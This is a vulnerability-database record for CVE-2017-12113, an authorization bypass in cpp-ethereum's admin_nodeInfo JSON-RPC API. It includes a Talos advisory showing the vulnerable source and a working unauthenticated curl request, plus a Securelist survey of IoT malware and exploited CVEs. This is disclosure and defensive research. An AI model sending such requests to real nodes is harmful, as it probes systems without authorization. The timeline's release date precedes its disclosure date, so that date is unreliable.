ID: CVE-2017-12113
Type: cve
Reporter: cve@mitre.org
Modified: 2019-10-03T00:03:00
Description
An exploitable improper authorization vulnerability exists in admin_nodeInfo API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability.
{"seebug": [{"lastseen": "2018-01-10T18:33:14", "description": "### Summary\r\nAn exploitable improper authorization vulnerability exists in admin_nodeInfo API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass.\r\nAn attacker can send JSON to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nEthereum commit 4e1015743b95821849d001618a7ce82c7c073768\r\n\r\n### Product URLs\r\nhttp://cpp-ethereum.org\r\n\r\n### CVSSv3 Score\r\n4.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N\r\n\r\n### CWE\r\nCWE-285: Improper Authorization\r\n\r\n### Details\r\nCPP-Ethereum is a C++ ethereum client, one of the 3 most popular clients for the ethereum platform. \r\n\r\nOne of the components that is part of cpp-ethereum is a JSON-RPC server which exposes various APIs to manage client/node functionality. Improper authorization checks in the implementation of the `admin_nodeInfo` API allow a remote attacker without any credentials to trigger functionality reserved only for a user with administrator privileges. 
We can observe a similar approach in two other clients (lack of any kind of authorization) but in this case the situation is exacerbated by the fact that:\r\n\r\n- By default the interface is bound to 0.0.0.0, which means it\u2019s exposed to the world\r\n- The Content-Type set to \u2018application/json\u2019 during requests is not enforced, which means that even if the eth JSON-RPC daemon is run on a machine behind a NAT, the JSON-RPC APIs can still be easily triggered by CSRF or SSRF attacks.\r\n- An older version of the same API implemented an authorization check\r\n- There is no visible option to change the default JSON-RPC interface to localhost\r\n\r\nFor comparison let us take geth (the go ethereum client), which also implements a JSON-RPC interface but with much better security practices:\r\n\r\n- By default the interface is bound to localhost\r\n- The \u201cContent-Type\u201d request header value must be set to \u2018application/json\u2019\r\n- CORS settings are set to block all \"cross-domain\" requests by default\r\n\r\nLet us take a look at `admin_nodeInfo` and describe in detail the improper and inconsistent authorization check.\r\n```\r\nLine 55 Json::Value AdminNet::admin_nodeInfo()\r\nLine 56 {\r\nLine 57 Json::Value ret;\r\nLine 58 p2p::NodeInfo i = m_network.nodeInfo();\r\nLine 59 ret[\"name\"] = i.version;\r\nLine 60 ret[\"ports\"] = Json::objectValue;\r\nLine 61 // Both ports are equal as of 2016-02-04, migt change later\r\nLine 62 ret[\"ports\"][\"discovery\"] = i.port;\r\nLine 63 ret[\"ports\"][\"listener\"] = i.port;\r\nLine 64 ret[\"ip\"] = i.address;\r\nLine 65 ret[\"listenAddr\"] = i.address + \":\" + toString(i.port);\r\nLine 66 ret[\"id\"] = i.id.hex();\r\nLine 67 ret[\"enode\"] = i.enode();\r\nLine 68 ret[\"protocols\"] = Json::objectValue;\r\nLine 69 ret[\"protocols\"][\"eth\"] = Json::objectValue; //@todo fill with information\r\nLine 70 return ret;\r\nLine 71 }\r\nLine 72\r\n```\r\n\r\nAs we can see there is no check for 
calling user privileges, which is done in a couple of other APIs via the `RPC_ADMIN` macro. The same functionality is exposed over the `admin_net_nodeInfo` API, where the privilege check is made at the beginning of the API body:\r\n```\r\nLine 41 Json::Value AdminNet::admin_net_nodeInfo(std::string const& _session)\r\nLine 42 {\r\nLine 43 RPC_ADMIN;\r\nLine 44 Json::Value ret;\r\nLine 45 p2p::NodeInfo i = m_network.nodeInfo();\r\nLine 46 ret[\"name\"] = i.version;\r\nLine 47 ret[\"port\"] = i.port;\r\nLine 48 ret[\"address\"] = i.address;\r\nLine 49 ret[\"listenAddr\"] = i.address + \":\" + toString(i.port);\r\nLine 50 ret[\"id\"] = i.id.hex();\r\nLine 51 ret[\"enode\"] = i.enode();\r\nLine 52 return ret;\r\nLine 53 }\r\n```\r\n\r\nWe are aware that this client is not recommended for mining and that the mentioned functionality related to the administrator interface is turned off by default. However, when enabled, the default behavior is insecure and can allow a remote attacker to perform unauthenticated RPC requests.\r\n\r\n### Crash Information\r\n```\r\nicewall@ubuntu:~/bugs/cpp-ethereum/build/eth$ ./eth -j --ipc --private 123 --no-discovery --datadir `pwd`/data --config config.json --admin-via-http \r\ncpp-ethereum, a C++ Ethereum client\r\ncpp-ethereum 1.3.0\r\n By cpp-ethereum contributors, (c) 2013-2016.\r\n See the README for contributors and credits.\r\nNetworking disabled. 
To start, use netstart or pass --bootstrap or a remote host.\r\nJSONRPC Admin Session Key: Zt9zxSANHZs=\r\n \u2139 03:09:10 AM.197|miner0 Loading full DAG of seedhash: #00000000\u2026\r\n \u2139 03:09:10 AM.978|miner0 Full DAG loaded\r\n\r\nicewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"admin_nodeInfo\",\"params\":[],\"id\":1}' localhost:8545 \r\n{\"id\":1,\"jsonrpc\":\"2.0\",\"result\":{\"enode\":\"enode://d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517@0.0.0.0:0\",\"id\":\"d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517\",\"ip\":\"0.0.0.0\",\"listenAddr\":\"0.0.0.0:0\",\"name\":\"eth/v1.3.0/Linux/g++/Interpreter/RelWithDebInfo/4e101574/\",\"ports\":{\"discovery\":0,\"listener\":0},\"protocols\":{\"eth\":{}}}}\r\nicewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"admin_nodeInfo\",\"params\":[],\"id\":1}' localhost:8545 | python -m json.tool\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 558 100 496 100 62 98k 12668 --:--:-- --:--:-- --:--:-- 121k\r\n{\r\n \"id\": 1,\r\n \"jsonrpc\": \"2.0\",\r\n \"result\": {\r\n \"enode\": \"enode://d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517@0.0.0.0:0\",\r\n \"id\": \"d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517\",\r\n \"ip\": \"0.0.0.0\",\r\n \"listenAddr\": \"0.0.0.0:0\",\r\n \"name\": \"eth/v1.3.0/Linux/g++/Interpreter/RelWithDebInfo/4e101574/\",\r\n \"ports\": {\r\n \"discovery\": 0,\r\n \"listener\": 0\r\n },\r\n \"protocols\": {\r\n \"eth\": {}\r\n }\r\n }\r\n}\r\n```\r\n\r\n### Timeline\r\n* 2017-12-06 - Vendor Disclosure\r\n* 2017-01-09 - Public 
Release", "published": "2018-01-10T00:00:00", "title": "CPP-Ethereum JSON-RPC admin_nodeInfo improper authorization Vulnerability(CVE-2017-12113)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12113"], "modified": "2018-01-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97067", "id": "SSV:97067", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "talos": [{"lastseen": "2020-07-01T21:24:54", "bulletinFamily": "info", "cvelist": ["CVE-2017-12113"], "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0465\n\n## CPP-Ethereum JSON-RPC admin_nodeInfo improper authorization Vulnerability\n\n##### January 9, 2018\n\n##### CVE Number\n\nCVE-2017-12113 \n\n### Summary\n\nAn exploitable improper authorization vulnerability exists in admin_nodeInfo API of cpp-ethereum\u2019s JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. \nAn attacker can send JSON to trigger this vulnerability.\n\n### Tested Versions\n\nEthereum commit 4e1015743b95821849d001618a7ce82c7c073768\n\n### Product URLs\n\n<http://cpp-ethereum.org>\n\n### CVSSv3 Score\n\n4.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N\n\n### CWE\n\nCWE-285: Improper Authorization\n\n### Details\n \n \n CPP-Ethereum is a C++ ethereum client, one of the 3 most popular clients for the ethereum platform. One of the components that is part of cpp-ethereum is a JSON-RPC server which exposes various APIs to manage client/node functionality. Improper authorization checks in the implementation of the `admin_nodeInfo` API allow a remote attacker without any credentials to trigger functionality reserved only for a user with administrator privileges. 
We can observe a similar approach in two other clients (lack of any kind of authorization) but in this case the situation is exacerbated by the fact that:\n \n -\tBy default the interface is bound to 0.0.0.0, which means it\u2019s exposed to the world\n -\tThe Content-Type set to \u2018application/json\u2019 during requests is not enforced, which means that even if the eth JSON-RPC daemon is run on a machine behind a NAT, \n \tthe JSON-RPC APIs can still be easily triggered by CSRF or SSRF attacks.\n -\tAn older version of the same API implemented an authorization check\n -\tThere is no visible option to change the default JSON-RPC interface to localhost\n \n\nFor comparison let us take geth (the go ethereum client), which also implements a JSON-RPC interface but with much better security practices:\n \n -\tBy default the interface is bound to localhost\n -\tThe \u201cContent-Type\u201d request header value must be set to \u2018application/json\u2019\n -\tCORS settings are set to block all \u201ccross-domain\u201d requests by default\n \n\nLet us take a look at `admin_nodeInfo` and describe in detail the improper and inconsistent authorization check.\n \n \n Line 55\tJson::Value AdminNet::admin_nodeInfo()\n Line 56\t{\n Line 57\t\tJson::Value ret;\n Line 58\t\tp2p::NodeInfo i = m_network.nodeInfo();\n Line 59\t\tret[\"name\"] = i.version;\n Line 60\t\tret[\"ports\"] = Json::objectValue;\n Line 61\t\t// Both ports are equal as of 2016-02-04, migt change later\n Line 62\t\tret[\"ports\"][\"discovery\"] = i.port;\n Line 63\t\tret[\"ports\"][\"listener\"] = i.port;\n Line 64\t\tret[\"ip\"] = i.address;\n Line 65\t\tret[\"listenAddr\"] = i.address + \":\" + toString(i.port);\n Line 66\t\tret[\"id\"] = i.id.hex();\n Line 67\t\tret[\"enode\"] = i.enode();\n Line 68\t\tret[\"protocols\"] = Json::objectValue;\n Line 69\t\tret[\"protocols\"][\"eth\"] = Json::objectValue; //@todo fill with information\n Line 70\t\treturn ret;\n Line 71\t}\n Line 72\n \n\nAs we can see there is no check for calling 
user privileges, which is done in a couple of other APIs via the `RPC_ADMIN` macro. The same functionality is exposed over the `admin_net_nodeInfo` API, where the privilege check is made at the beginning of the API body:\n \n \n Line 41\tJson::Value AdminNet::admin_net_nodeInfo(std::string const& _session)\n Line 42\t{\n Line 43\t\tRPC_ADMIN;\n Line 44\t\tJson::Value ret;\n Line 45\t\tp2p::NodeInfo i = m_network.nodeInfo();\n Line 46\t\tret[\"name\"] = i.version;\n Line 47\t\tret[\"port\"] = i.port;\n Line 48\t\tret[\"address\"] = i.address;\n Line 49\t\tret[\"listenAddr\"] = i.address + \":\" + toString(i.port);\n Line 50\t\tret[\"id\"] = i.id.hex();\n Line 51\t\tret[\"enode\"] = i.enode();\n Line 52\t\treturn ret;\n Line 53\t}\n \n\nWe are aware that this client is not recommended for mining and that the mentioned functionality related to the administrator interface is turned off by default. However, when enabled, the default behavior is insecure and can allow a remote attacker to perform unauthenticated RPC requests.\n\n### Crash Information\n \n \n icewall@ubuntu:~/bugs/cpp-ethereum/build/eth$ ./eth -j --ipc --private 123 --no-discovery --datadir `pwd`/data --config config.json --admin-via-http \n cpp-ethereum, a C++ Ethereum client\n cpp-ethereum 1.3.0\n By cpp-ethereum contributors, (c) 2013-2016.\n See the README for contributors and credits.\n Networking disabled. 
To start, use netstart or pass --bootstrap or a remote host.\n JSONRPC Admin Session Key: Zt9zxSANHZs=\n \u2139 03:09:10 AM.197|miner0 Loading full DAG of seedhash: #00000000\u2026\n \u2139 03:09:10 AM.978|miner0 Full DAG loaded\n \n icewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"admin_nodeInfo\",\"params\":[],\"id\":1}' localhost:8545 \n {\"id\":1,\"jsonrpc\":\"2.0\",\"result\":{\"enode\":\"enode://d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517@0.0.0.0:0\",\"id\":\"d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517\",\"ip\":\"0.0.0.0\",\"listenAddr\":\"0.0.0.0:0\",\"name\":\"eth/v1.3.0/Linux/g++/Interpreter/RelWithDebInfo/4e101574/\",\"ports\":{\"discovery\":0,\"listener\":0},\"protocols\":{\"eth\":{}}}}\n icewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"admin_nodeInfo\",\"params\":[],\"id\":1}' localhost:8545 | python -m json.tool\n % Total % Received % Xferd Average Speed Time Time Time Current\n \t\t\t\t\t\t\t\t Dload Upload Total Spent Left Speed\n 100 558 100 496 100 62 98k 12668 --:--:-- --:--:-- --:--:-- 121k\n {\n \t\"id\": 1,\n \t\"jsonrpc\": \"2.0\",\n \t\"result\": {\n \t\t\"enode\": \"enode://d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517@0.0.0.0:0\",\n \t\t\"id\": \"d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517\",\n \t\t\"ip\": \"0.0.0.0\",\n \t\t\"listenAddr\": \"0.0.0.0:0\",\n \t\t\"name\": \"eth/v1.3.0/Linux/g++/Interpreter/RelWithDebInfo/4e101574/\",\n \t\t\"ports\": {\n \t\t\t\"discovery\": 0,\n \t\t\t\"listener\": 0\n \t\t},\n \t\t\"protocols\": {\n \t\t\t\"eth\": {}\n \t\t}\n \t}\n }\n \n\n### Timeline\n\n2017-12-06 - Vendor Disclosure 
\n2017-01-09 - Public Release\n\n##### Credit\n\nDiscovered by Marcin 'Icewall' Noga of Cisco Talos.\n", "edition": 8, "modified": "2018-01-09T00:00:00", "published": "2018-01-09T00:00:00", "id": "TALOS-2017-0465", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0465", "title": "CPP-Ethereum JSON-RPC admin_nodeInfo improper authorization Vulnerability", "type": "talos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2018-09-28T10:13:53", "bulletinFamily": "blog", "cvelist": ["CVE-2014-8361", "CVE-2017-12113", "CVE-2017-7240", "CVE-2018-1000049", "CVE-2018-10088", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-7445"], "description": "\n\nCybercriminals' interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn't bode well for the years ahead.\n\nWe decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.\n\n_Number of malware samples for IoT devices in Kaspersky Lab's collection, 2016-2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153718/en-iot-malware-collection.png>)\n\nOne of the most popular attack and infection vectors against devices remains cracking Telnet passwords. 
In Q2 2018, there were three times as many such attacks against our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/>) as all other types combined.\n\n**service** | **% of attacks** \n---|--- \n**Telnet** | 75.40% \n**SSH** | 11.59% \n**other** | 13.01% \n \nWhen it came to downloading malware onto IoT devices, cybercriminals' preferred option was one of the [Mirai](<https://securelist.com/is-mirai-really-as-black-as-its-being-painted/76954/>) family (20.9%).\n\n**#** | **downloaded malware** | **% of attacks** \n---|---|--- \n**1** | Backdoor.Linux.Mirai.c | 15.97% \n**2** | Trojan-Downloader.Linux.Hajime.a | 5.89% \n**3** | Trojan-Downloader.Linux.NyaDrop.b | 3.34% \n**4** | Backdoor.Linux.Mirai.b | 2.72% \n**5** | Backdoor.Linux.Mirai.ba | 1.94% \n**6** | Trojan-Downloader.Shell.Agent.p | 0.38% \n**7** | Trojan-Downloader.Shell.Agent.as | 0.27% \n**8** | Backdoor.Linux.Mirai.n | 0.27% \n**9** | Backdoor.Linux.Gafgyt.ba | 0.24% \n**10** | Backdoor.Linux.Gafgyt.af | 0.20% \n \n_Top 10 malware downloaded onto infected IoT devices following a successful Telnet password crack_\n\nAnd here are the Top 10 countries from which our traps were hit by Telnet password attacks:\n\n_Geographical distribution of the number of infected devices, Q2 2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153651/en-map-infected-devices-q2-2018.png>)\n\nAs we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia took 4th place in our list (7%). 
Overall for the period January 1 \u2013 July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.\n\nSince some smart device owners change the default Telnet password to one that is more complex, and many gadgets don't support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.\n\nAn example of the use of \"alternative technology\" is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:\n\n * [Vulnerabilities in D-Link 850L router firmware](<https://blogs.securiteam.com/index.php/archives/3364>)\n * [Vulnerabilities in GoAhead IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>)\n * [Vulnerabilities in MVPower CCTV cameras](<https://www.pentestpartners.com/security-blog/pwning-cctv-cameras/>)\n * [Vulnerability in Netgear ReadyNAS Surveillance](<https://blogs.securiteam.com/index.php/archives/3409>)\n * [Vulnerability in Vacron NVR](<https://blogs.securiteam.com/index.php/archives/3445>)\n * [Vulnerability in Netgear DGN devices](<http://seclists.org/bugtraq/2013/Jun/8>)\n * [Vulnerabilities in Linksys E1500/E2500 routers](<http://www.s3cur1ty.de/m1adv2013-004>)\n * [Vulnerabilities in D-Link DIR-600 and DIR 300 - HW rev B1 routers](<http://www.s3cur1ty.de/m1adv2013-003>)\n * Vulnerabilities in AVTech devices\n\nAdvantages of this distribution method over password cracking:\n\n * Infection occurs much faster\n * It is much harder to patch a software vulnerability than change a password or disable/block the service\n\nAlthough this 
method is more difficult to implement, it found favor with many virus writers, and it wasn't long before new Trojans exploiting known vulnerabilities in smart device software started appearing.\n\n## New attacks, old malware\n\nTo see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:\n\n**Service** | **Port** | **% of attacks** | **Attack vector** | **Malware families** \n---|---|---|---|--- \n**Telnet** | 23, 2323 | 82.26% | Bruteforce | Mirai, Gafgyt \n**SSH** | 22 | 11.51% | Bruteforce | Mirai, Gafgyt \n**Samba** | 445 | 2.78% | EternalBlue, EternalRed, CVE-2018-7445 | - \n**tr-069** | 7547 | 0.77% | [RCE in TR-069 implementation](<https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/>) | Mirai, Hajime \n**HTTP** | 80 | 0.76% | Attempts to exploit vulnerabilities in a web server or crack an admin console password | - \n**winbox (RouterOS)** | 8291 | 0.71% | [Used for RouterOS (MikroTik) authentication](<https://xakep.ru/2018/03/29/hajime-hunts-mikrotik/>) and [WinBox-based attacks](<https://threatpost.ru/mikrotik-patched-zero-day-vulnerability-in-record-time/25811/>) | Hajime \n**Mikrotik http** | 8080 | 0.23% | RCE in MikroTik RouterOS < 6.38.5 [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**MSSQL** | 1433 | 0.21% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n**GoAhead httpd** | 81 | 0.16% | [RCE in GoAhead IP cameras](<http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-81-en/>) | Persirai, Gafgyt \n**Mikrotik http** | 8081 | 0.15% | [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**Ethereum JSON-RPC** | 8545 | 0.15% | [Authorization bypass (CVE-2017-12113)](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0465>) | - \n**RDP** | 3389 | 0.12% | Bruteforce 
| - \n**XionMai uc-httpd** | 8000 | 0.09% | [Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices)](<https://www.bleepingcomputer.com/news/security/all-that-port-8000-traffic-this-week-yeah-thats-satori-looking-for-new-bots/>) | Satori \n**MySQL** | 3306 | 0.08% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n \nThe vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven't seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) and the Monero cryptocurrency miner [EternalMiner](<https://securelist.com/sambacry-is-coming/78674/>).\n\nHere's the breakdown of possibly infected IoT devices that responded at the IPs that attacked our honeypots in Q2 2018:\n\n**Device** | **% of infected devices** \n---|--- \n**MikroTik** | 37.23% \n**TP-Link** | 9.07% \n**SonicWall** | 3.74% \n**AV tech** | 3.17% \n**Vigor** | 3.15% \n**Ubiquiti** | 2.80% \n**D-Link** | 2.49% \n**Cisco** | 1.40% \n**AirTies** | 1.25% \n**Cyberoam** | 1.13% \n**HikVision** | 1.11% \n**ZTE** | 0.88% \n**Unspecified device** | 0.68% \n**Unknown DVR** | 31.91% \n \nAs can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. ~~What's interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). 
Most likely they were infected through the known (since March 2017) [CVE-2017-7240](<https://nvd.nist.gov/vuln/detail/CVE-2017-7240>) vulnerability in PST10 WebServer, which is used in their firmware.~~1\n\n### Port 7547\n\nAttacks against remote device management ([TR-069](<https://en.wikipedia.org/wiki/TR-069>) specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that's despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.\n\nAnother type of attack exploits the [Chimay-Red vulnerability](<https://wikileaks.org/ciav7p1/cms/page_16384604.html>) in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.\n\n### IP cameras\n\nIP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.\n\nOn June 8, 2018, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/>) was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. 
The culprit for this spike in activity was the Satori Trojan, known for previously attacking [GPON routers](<http://blog.netlab.360.com/gpon-exploit-in-the-wild-ii-satori-botnet-en/>).\n\n## New malware and threats to end users\n\n### DDoS attacks\n\nAs before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.\n\nThis is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often be \"cured\" with a simple reboot.\n\n### Cryptocurrency mining\n\nAnother type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.\n\nA more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. 
Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:\n\n * At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular: \n * [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) \u2013 RCE in the miniigd SOAP service in Realtek SDK\n * [CVE 2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202017-17215>) \u2013 RCE in the firmware of Huawei HG532 routers\n * [CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>), [CVE-2018-10562](<https://nvd.nist.gov/vuln/detail/CVE-2018-10562>) \u2013 authorization bypass and execution of arbitrary commands on Dasan GPON routers\n * [CVE-2018-10088](<https://nvd.nist.gov/vuln/detail/CVE-2018-10088>) \u2013 buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers\n * Using compromised routers and the [CVE-2018-1000049](<https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/>) vulnerability in the [Claymore](<https://www.dualminer.ru/>) Ethereum miner remote management tool, they replace the configured wallet address with their own.\n\n### Data theft\n\nThe [VPNFilter](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals' server. Here are the main features of VPNFilter:\n\n * Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject JavaScript code into intercepted web pages.\n * Reboot resistant. 
The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.\n * Uses TOR for communication with C&C.\n * Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.\n\nThe Trojan's distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.\n\nThe very [first VPNFilter report](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:\n\n * ASUS\n * D-Link\n * Huawei\n * Linksys\n * MikroTik\n * Netgear\n * QNAP\n * TP-Link\n * Ubiquiti\n * Upvel\n * ZTE\n\nThe situation is made worse by the fact that these manufacturers' devices are used not only in corporate networks, but often as home routers.\n\n### Conclusion\n\nSmart devices are on the rise, with [some forecasts](<https://www.statista.com/statistics/764026/number-of-iot-devices-in-use-worldwide/>) suggesting that by 2020 their number will exceed the world's population several times over. Yet manufacturers still don't prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. 
Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).\n\nMalware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.\n\nHere are some simple tips to help minimize the risk of smart device infection:\n\n * Don't give access to the device from an external network unless absolutely necessary\n * Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)\n * Regularly check for new firmware versions and update the device\n * Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters\n * Change the factory passwords at initial setup (even if the device does not prompt you to do so)\n * Close/block unused ports, if there is such an option. For example, if you don't connect to the router via Telnet (port TCP:23), it's a good idea to disable it so as to close off a potential loophole to intruders.\n\n \n\n* * *\n\n1 \u2014 The previous version of the text incorrectly stated that Kaspersky Lab honeypots, used for detecting botnets, were attacked by 33 Miele dishwashers.\n\nA Miele representative shared new details with us so we could review our earlier findings. \n\nWe understand that connection attempts were performed by other objects from the networks that presented the targeted IP-addresses \u2013 including, but not limited to, a router or another device within the network.\n\nWe would like to thank the company for bringing this to our attention and being able to clarify our findings. 
We apologize for any confusion caused.", "modified": "2018-09-18T10:00:36", "published": "2018-09-18T10:00:36", "id": "SECURELIST:2F75371B5752C888430A598DF749FD1A", "href": "https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/", "type": "securelist", "title": "New trends in the world of IoT threats", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}